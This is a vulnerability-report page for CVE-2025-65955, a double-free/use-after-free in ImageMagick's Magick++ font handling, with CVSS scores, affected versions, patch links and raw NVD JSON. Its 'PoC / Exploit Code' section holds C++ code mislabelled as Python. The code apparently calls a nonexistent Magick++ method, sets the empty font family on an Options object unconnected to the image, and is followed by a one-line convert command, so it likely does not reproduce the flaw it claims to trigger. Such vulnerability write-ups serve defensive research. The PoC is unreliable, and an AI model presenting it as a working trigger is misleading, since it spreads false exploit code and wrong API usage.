Security Vulnerability Report
中文
CVE-2025-65955 CVSS 4.9 MEDIUM

CVE-2025-65955

Published: 2025-12-02 23:15:46
Last Modified: 2026-01-13 02:50:52
Source: [email protected]

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-9 and 6.9.13-34, there is a vulnerability in ImageMagick’s Magick++ layer that manifests when Options::fontFamily is invoked with an empty string. Clearing a font family calls RelinquishMagickMemory on _drawInfo->font, freeing the font string but leaving _drawInfo->font pointing to freed memory while _drawInfo->family is set to that (now-invalid) pointer. Any later cleanup or reuse of _drawInfo->font re-frees or dereferences dangling memory. DestroyDrawInfo and other setters (Options::font, Image::font) assume _drawInfo->font remains valid, so destruction or subsequent updates trigger crashes or heap corruption. This vulnerability is fixed in 7.1.2-9 and 6.9.13-34.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:* - VULNERABLE
ImageMagick < 6.9.13-34
ImageMagick < 7.1.2-9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <Magick++.h> #include <iostream> using namespace Magick; int main() { InitializeMagick(nullptr); try { // Create an image Image image(Geometry(100, 100), Color("white")); // Get image info ImageInfo *imageInfo = image.mutableImageInfo(); DrawInfo *drawInfo = image.perceptibleImage(); // Trigger the vulnerability by setting empty font family // This will cause the double-free/use-after-free condition std::cout << "Triggering CVE-2025-65955..." << std::endl; // Set font family to empty string - this triggers the bug path Options options; options.fontFamily(""); // Empty string triggers the vulnerability // The following operations will trigger the use-after-free // when cleanup occurs image.font("test"); std::cout << "PoC executed" << std::endl; } catch (Exception &error_) { std::cerr << "Caught exception: " << error_.what() << std::endl; } DestroyMagick(); return 0; } // Alternative PoC: Using ImageMagick command line to trigger via SVG // convert -size 100x100 xc:white -font '' -pointsize 12 label:test output.png

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65955", "sourceIdentifier": "[email protected]", "published": "2025-12-02T23:15:45.603", "lastModified": "2026-01-13T02:50:51.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-9 and 6.9.13-34, there is a vulnerability in ImageMagick’s Magick++ layer that manifests when Options::fontFamily is invoked with an empty string. Clearing a font family calls RelinquishMagickMemory on _drawInfo->font, freeing the font string but leaving _drawInfo->font pointing to freed memory while _drawInfo->family is set to that (now-invalid) pointer. Any later cleanup or reuse of _drawInfo->font re-frees or dereferences dangling memory. DestroyDrawInfo and other setters (Options::font, Image::font) assume _drawInfo->font remains valid, so destruction or subsequent updates trigger crashes or heap corruption. This vulnerability is fixed in 7.1.2-9 and 6.9.13-34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.4, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}, {"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.9.13-34", "matchCriteriaId": "2863112C-36DC-40B6-A685-D077750AA883"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0-0", "versionEndExcluding": "7.1.2-9", "matchCriteriaId": "4952FECC-087D-40B6-93F0-8E66CC53B89C"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/commit/6409f34d637a34a1c643632aa849371ec8b3b5a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ImageMagick/ImageMagick/commit/6f81eb15f822ad86e8255be75efad6f9762c32f8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-q3hc-j9x5-mp9m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.